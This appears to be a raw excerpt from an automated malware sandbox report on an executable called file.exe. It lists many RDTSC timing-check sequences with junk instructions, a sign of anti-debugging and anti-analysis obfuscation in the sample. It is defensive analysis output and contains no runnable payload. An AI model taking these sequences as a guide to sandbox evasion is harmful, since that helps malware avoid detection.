                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F1EB second address: D0F1F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jnc 00007FB97CFE9216h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F5EA second address: D0F5EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F5EE second address: D0F5F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF2AA second address: CBF2B0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF2B0 second address: CBF2F2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB97CFE9218h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FB97CFE9218h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov di, bx 0x0000002a push 00000004h 0x0000002c xor dword ptr [ebp+122D24D9h], edx 0x00000032 nop 0x00000033 push ecx 0x00000034 push eax 0x00000035 push edx 0x00000036 jnl 00007FB97CFE9216h 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F877 second address: D0F87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F87D second address: D0F8B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB97CFE9216h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d jmp 00007FB97CFE921Ah 0x00000012 pop ebx 0x00000013 push eax 0x00000014 jmp 00007FB97CFE921Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FB97CFE921Dh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F8B3 second address: D0F8B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D101FC second address: D10218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB97CFE9226h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10218 second address: D1021C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1021C second address: D10220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10220 second address: D10231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB97CFF0156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13B0F second address: D13B1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13DD1 second address: D13DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007FB97CFF0160h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13F6A second address: D13F6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13F6F second address: D13F74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13F74 second address: D13F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13F7C second address: D13F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFF0162h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13F9D second address: D13FB5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB97CFE921Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jns 00007FB97CFE9216h 0x00000010 jbe 00007FB97CFE921Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16F0B second address: D16F15 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB97CFF015Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1DAFC second address: D1DB01 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1DDDA second address: D1DDED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF015Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1DDED second address: D1DE09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFE9228h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1DE09 second address: D1DE2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FB97CFF0156h 0x00000010 jmp 00007FB97CFF0162h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1E0E4 second address: D1E0ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1E3F3 second address: D1E3F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1E3F7 second address: D1E407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FB97CFE9216h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1E70A second address: D1E70F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1E70F second address: D1E714 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1E714 second address: D1E71A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1E71A second address: D1E73B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jnc 00007FB97CFE9216h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jp 00007FB97CFE923Ah 0x00000019 push eax 0x0000001a push edx 0x0000001b jl 00007FB97CFE9216h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F01F second address: D1F027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F027 second address: D1F04D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB97CFE9228h 0x0000000b popad 0x0000000c pop esi 0x0000000d pushad 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F610 second address: D1F614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F614 second address: D1F631 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FB97CFE9221h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F631 second address: D1F636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F8E4 second address: D1F8F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE921Dh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F8F6 second address: D1F8FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D24515 second address: D24526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jnl 00007FB97CFE9216h 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2836B second address: D28371 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D28371 second address: D28376 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27682 second address: D27686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D29B26 second address: D29B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB97CFE9216h 0x0000000a jmp 00007FB97CFE921Eh 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D29B3F second address: D29B55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF015Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D29B55 second address: D29B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D312EC second address: D312F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB97CFF0156h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D312F8 second address: D3131A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FB97CFE9218h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d ja 00007FB97CFE922Ch 0x00000013 pushad 0x00000014 jnp 00007FB97CFE9216h 0x0000001a jng 00007FB97CFE9216h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31759 second address: D31765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31765 second address: D317A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE9229h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jg 00007FB97CFE922Ah 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31926 second address: D3192C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3192C second address: D31936 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB97CFE9216h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31936 second address: D31956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB97CFF0167h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31956 second address: D3195C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31D65 second address: D31D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31D6A second address: D31D7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FB97CFE9216h 0x0000000a jo 00007FB97CFE9216h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32166 second address: D3216B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3216B second address: D32173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32173 second address: D32177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32177 second address: D3219A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFE9228h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D30E2B second address: D30E3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007FB97CFF015Ah 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D30E3D second address: D30E5B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FB97CFE9229h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D384FB second address: D3850E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FB97CFF015Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3850E second address: D38514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38514 second address: D38539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FB97CFF0167h 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38539 second address: D3854E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB97CFE9221h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3886A second address: D3886E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3886E second address: D38894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FB97CFE9234h 0x0000000c jmp 00007FB97CFE9228h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38894 second address: D3889C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3889C second address: D388A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB97CFE9216h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D478B9 second address: D478BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47406 second address: D47427 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE9227h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47427 second address: D4742D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4742D second address: D47449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007FB97CFE9216h 0x0000000c popad 0x0000000d jmp 00007FB97CFE921Fh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D475B0 second address: D475BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007FB97CFF0156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B9DE second address: D4B9E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B9E3 second address: D4B9FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB97CFF0165h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B9FC second address: D4BA02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B590 second address: D4B594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B594 second address: D4B5C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE9228h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d popad 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jg 00007FB97CFE9216h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B5C0 second address: D4B5C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D593ED second address: D59407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFE9222h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C27D second address: D5C288 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FB97CFF0156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C288 second address: D5C28E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D643F9 second address: D643FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63011 second address: D63027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jp 00007FB97CFE9221h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63125 second address: D63129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63129 second address: D6315E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB97CFE9216h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d js 00007FB97CFE9216h 0x00000013 pop eax 0x00000014 jl 00007FB97CFE9235h 0x0000001a jmp 00007FB97CFE9229h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6346B second address: D63470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63470 second address: D6347C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB97CFE921Eh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D635EC second address: D635F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63792 second address: D6379E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6412F second address: D64135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D64135 second address: D6417A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB97CFE9216h 0x00000008 jmp 00007FB97CFE9228h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007FB97CFE921Fh 0x00000017 jl 00007FB97CFE9218h 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 jne 00007FB97CFE9216h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76CBB second address: D76CC0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D866AF second address: D866B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D866B4 second address: D866C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB97CFF015Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D866C4 second address: D866C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8625F second address: D86263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96101 second address: D96117 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE921Ch 0x00000007 jo 00007FB97CFE9216h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D963E4 second address: D963E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D963E8 second address: D963EE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96552 second address: D96558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
